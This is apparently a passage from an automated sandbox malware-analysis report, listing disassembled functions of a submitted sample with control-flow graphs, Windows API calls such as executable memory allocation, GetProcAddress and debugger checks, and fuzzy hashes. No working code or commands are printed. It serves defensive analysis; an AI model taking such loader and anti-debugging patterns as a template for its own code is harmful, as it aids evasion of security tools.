                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: 7135cb8879ee4e544566e29a06a481b0530bd1a2012366eaa3c7e6d196c79874
                                                    • Instruction ID: b102fb97d9434d61ad559ccc4d49d4e485111d2f9467978baa14f28cbcefaba6
                                                    • Opcode Fuzzy Hash: 7135cb8879ee4e544566e29a06a481b0530bd1a2012366eaa3c7e6d196c79874
                                                    • Instruction Fuzzy Hash: 4CE08631200208BBCB212BE8EC0DB8E3E5C9B00395F448060FB0C9A061DB3889449F98
                                                    Function 00C78B20 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 350 c78b20-c78b48 351 c78b4e-c78b50 350->351 352 c78b4a-c78b4c 350->352 354 c78b56-c78b5d call c78a55 351->354 355 c78b52-c78b54 351->355 353 c78b9f-c78ba2 352->353 357 c78b62-c78b66 354->357 355->353 358 c78b85-c78b9c 357->358 359 c78b68-c78b76 GetProcAddress 357->359 360 c78b9e 358->360 359->358 361 c78b78-c78b83 call c73b89 359->361 360->353 361->360
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 602b783db07ac2ec55a46078ffff1741c766ccb83c70616782a5a80662b2f865
                                                    • Instruction ID: de06df5e4a15aa5b301555fa21513ec619071f323bd2790674828af41d5509b6
                                                    • Opcode Fuzzy Hash: 602b783db07ac2ec55a46078ffff1741c766ccb83c70616782a5a80662b2f865
                                                    • Instruction Fuzzy Hash: 1A01B5777542119F9F168EAAEC89E5E3796FBC5330724C224FB1CCB298EE3099059790
                                                    Function 00C87BE0 Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 364 c87be0-c87c52 call c61770 call c69271 369 c87c68-c87cc1 VirtualAlloc call c87930 call c875d0 364->369 370 c87c54-c87c65 call c870c0 364->370 378 c87cea-c87cfa call c692b4 369->378 379 c87cc3-c87cce 369->379 370->369 380 c87ce0-c87ce2 call c692a1 379->380 381 c87cd0-c87cde 379->381 387 c87ce7 380->387 381->380 383 c87cfb-c87d00 call c6da8f 381->383 387->378
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00C87C76
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 806d7a04e6a6a221a05127b7188f2dbc5e7ca27d461ecd7c30627958c3f7553a
                                                    • Instruction ID: 42ce487b8bade73cf5e54c3a64e544301d8e7fbce64dcab0c2a9cf544038cbb9
                                                    • Opcode Fuzzy Hash: 806d7a04e6a6a221a05127b7188f2dbc5e7ca27d461ecd7c30627958c3f7553a
                                                    • Instruction Fuzzy Hash: 6831A371E042089BDB14EFA4CCD5BED77F4EF0D304F640269E904B7242EB759A449768

                                                    Non-executed Functions

                                                    Function 00C8123B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: 1a1f48a414b5e45046a473a5db8ca8acf613456f2e45c15a044c95b41880b69c
                                                    • Instruction ID: ed8a2a45368b57ced6a74d24298b54b246457a9368bdaed6bd7a126087e0473c
                                                    • Opcode Fuzzy Hash: 1a1f48a414b5e45046a473a5db8ca8acf613456f2e45c15a044c95b41880b69c
                                                    • Instruction Fuzzy Hash: 1BD22971E082288FDB65DE28CD447EAB7F9EB44309F1845EAD81DE7240E734AE818F45
                                                    Function 00C8069B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C809B9,00000002,00000000,?,?,?,00C809B9,?,00000000), ref: 00C80734
                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00C809B9,00000002,00000000,?,?,?,00C809B9,?,00000000), ref: 00C8075D
                                                    • GetACP.KERNEL32(?,?,00C809B9,?,00000000), ref: 00C80772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 15902d5763e5676daf8f3b5f3a562c16d52a974b8b1b818d7449e828b77c7e09
                                                    • Instruction ID: 3bdb6cdfbd67be856e2420dd03f63f0bbccf39442bb2265cdfce81ad3c0e1c10
                                                    • Opcode Fuzzy Hash: 15902d5763e5676daf8f3b5f3a562c16d52a974b8b1b818d7449e828b77c7e09
                                                    • Instruction Fuzzy Hash: C321C422640100A6EBF0AF24C944B9B73A6AF90B5DF764424F91AD7110F732EF48CB58
                                                    Function 00C80870 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C8097C
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00C809C5
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C809D4
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C80A1C
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C80A3B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 415426439-0
                                                    • Opcode ID: 83522b2b814d320ada19c9ca03f829831d9850bb4f016615e7236380da94d11f
                                                    • Instruction ID: bf36cb2582f962c1c9ff16c3a95beb7c2f2e78ab40fc497cc6161409ae44d224
                                                    • Opcode Fuzzy Hash: 83522b2b814d320ada19c9ca03f829831d9850bb4f016615e7236380da94d11f
                                                    • Instruction Fuzzy Hash: 6551B372A00205AFEB50FFA5CC45BBE73B8FF44308F244469E925E7191DB709A48DB68
                                                    Function 00C7FF0C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00C74DBB,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C7FFCD
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C74DBB,?,?,?,00000055,?,-00000050,?,?), ref: 00C7FFF8
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C8015B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                    • String ID: utf8
                                                    • API String ID: 607553120-905460609
                                                    • Opcode ID: d358642a2e2c8a49ae39a19e26835d37b42cabdba93a1de0ec6572f363891c40
                                                    • Instruction ID: 7aca524968e65c5ce64fae8783f96ea9b6f93e19193116e5ed5d8e0f71751895
                                                    • Opcode Fuzzy Hash: d358642a2e2c8a49ae39a19e26835d37b42cabdba93a1de0ec6572f363891c40
                                                    • Instruction Fuzzy Hash: E3711631600202AAD724BB75CC86BAB73A8EF45714F24803DF51AD71C1EB70EE45A768
                                                    Function 00C777D9 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: 1ab9c4a2e1108fa885ed9bc233477250a89243ad6877a4383d0d79e0ea462a6b
                                                    • Instruction ID: b9d8ee78d2d35d09fd084043b120bee9a9511dc2f3c464b2c701b98567148068
                                                    • Opcode Fuzzy Hash: 1ab9c4a2e1108fa885ed9bc233477250a89243ad6877a4383d0d79e0ea462a6b
                                                    • Instruction Fuzzy Hash: 64B15C32E082499FEB15CF68C8817FEBBA5EF55310F15C266E918AB341D2749E01DB61
                                                    Function 00C7D43A Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C7D52A
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7D61E
                                                    • FindClose.KERNEL32(00000000), ref: 00C7D65D
                                                    • FindClose.KERNEL32(00000000), ref: 00C7D690
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFile$FirstNext
                                                    • String ID:
                                                    • API String ID: 1164774033-0
                                                    • Opcode ID: d00892257a9317978b03bc1569978310586e55551f9f468095d57c1ac010ee1a
                                                    • Instruction ID: 5e997d6cb44489ea724b015317c55aaed5f6e2b1458fca92706ef33d595bf5ab
                                                    • Opcode Fuzzy Hash: d00892257a9317978b03bc1569978310586e55551f9f468095d57c1ac010ee1a
                                                    • Instruction Fuzzy Hash: 7771E4B19051595FDF20EF34CC89AAEBBB9AF05304F14C1D9E05E97211DA315E859F24
                                                    Function 00C6993A Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C69946
                                                    • IsDebuggerPresent.KERNEL32 ref: 00C69A12
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C69A2B
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00C69A35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: b11bd4c403f7a7d7d1efdbf0ed54378ed88a6e541bb16cf01c1b6c842d169951
                                                    • Instruction ID: 11828bf052224ea4fb46bf2d85ba456c8beae968c3f2bf34b2dc68bcf569056f
                                                    • Opcode Fuzzy Hash: b11bd4c403f7a7d7d1efdbf0ed54378ed88a6e541bb16cf01c1b6c842d169951
                                                    • Instruction Fuzzy Hash: AB31FA75D012189BDF20DFA4D9897CDBBB8EF08300F50419AE40DAB251EB719A899F45
                                                    Function 00C8031F Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C80373
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C803BD
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C80483
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale$ErrorLast
                                                    • String ID:
                                                    • API String ID: 661929714-0
                                                    • Opcode ID: 37e2c0fcce2c9c3032f703bf63b7dc32675856e2bc1346fb3e9609995746aa04
                                                    • Instruction ID: b8e32dcbf25b4ee990fead72d3b4f3280517adcf674416ce0cc91bcc760882ae
                                                    • Opcode Fuzzy Hash: 37e2c0fcce2c9c3032f703bf63b7dc32675856e2bc1346fb3e9609995746aa04
                                                    • Instruction Fuzzy Hash: EA61B5715502079FDB68AF28CD82BBA77A8EF44308F204079E925C7581F774DA49DF58
                                                    Function 00C6D883 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00C6D97B
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00C6D985
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 00C6D992
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: e63cc1d37369e023aae24bbdcddcb33787ea292e650ba3194cc20ec9cd438e29
                                                    • Instruction ID: f809e5f7a9a50d7d7233c4902f183d52cb50ea9e036fb0a2034356411ae47b61
                                                    • Opcode Fuzzy Hash: e63cc1d37369e023aae24bbdcddcb33787ea292e650ba3194cc20ec9cd438e29
                                                    • Instruction Fuzzy Hash: 8E31C475D012289BCB21EF68DC8978DBBB8FF08310F5041EAE41DA7291EB709B859F55
                                                    Function 00C73050 Relevance: 3.4, APIs: 2, Instructions: 449COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4f3a54db89fbb62046169a24586f7d391bc7c95b58a475ac80c624a344fee02
                                                    • Instruction ID: c9a91ff8504dedff03d87bd0b02e98b3d922fd2e971a9cdfd1cd8544ee0b571e
                                                    • Opcode Fuzzy Hash: a4f3a54db89fbb62046169a24586f7d391bc7c95b58a475ac80c624a344fee02
                                                    • Instruction Fuzzy Hash: 49F14071E012599FDF14CFA9C8806ADFBB1FF88314F158269E829AB391D7319E01DB90
                                                    Function 00C76DB9 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00C76FE6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 1f256432e30bc496a2125aa5e9a7713c762659c726ade93b785a3a2172306c78
                                                    • Instruction ID: 3f58ddafee021922193d43eb2f7bec569c5bb471517be99f0d9ea5faac8cd3c6
                                                    • Opcode Fuzzy Hash: 1f256432e30bc496a2125aa5e9a7713c762659c726ade93b785a3a2172306c78
                                                    • Instruction Fuzzy Hash: 62B13C35610609DFD719CF28C48AB657BA1FF45364F25C658E8AECF2A1C335EA91CB40
                                                    Function 00C6962C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C69642
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    • Opcode ID: f5c36702df4b829efe9e3da24fbf366760a0a424f7d46d79e4cd578ef087aad5
                                                    • Instruction ID: 7947797a9cf24f2a70cab1cfc9d4e1cb297f6142f209f6a19766b06fbf8eef9a
                                                    • Opcode Fuzzy Hash: f5c36702df4b829efe9e3da24fbf366760a0a424f7d46d79e4cd578ef087aad5
                                                    • Instruction Fuzzy Hash: 46516DB19146058BDF64CFA9D9C5BAEBBF4FB48314F14852AE416EB294D378DA00CF50
                                                    Function 00C6F934 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: 23cac9371c1b21c94c8b4bff7d3ef3c1e67d2251687d2e0fef87409a041b6017
                                                    • Instruction ID: 2d7be9cb805426be1ba583a4c85e8cb55a705fad2b7c1a974135bb3e28706346
                                                    • Opcode Fuzzy Hash: 23cac9371c1b21c94c8b4bff7d3ef3c1e67d2251687d2e0fef87409a041b6017
                                                    • Instruction Fuzzy Hash: 74C1AF70A0064A9FCB34CF68E4D067EBBA1BF45314F24463DD8AA97292C731AE47DB51
                                                    Function 00C80572 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C805C6
                                                    Memory Dump Source
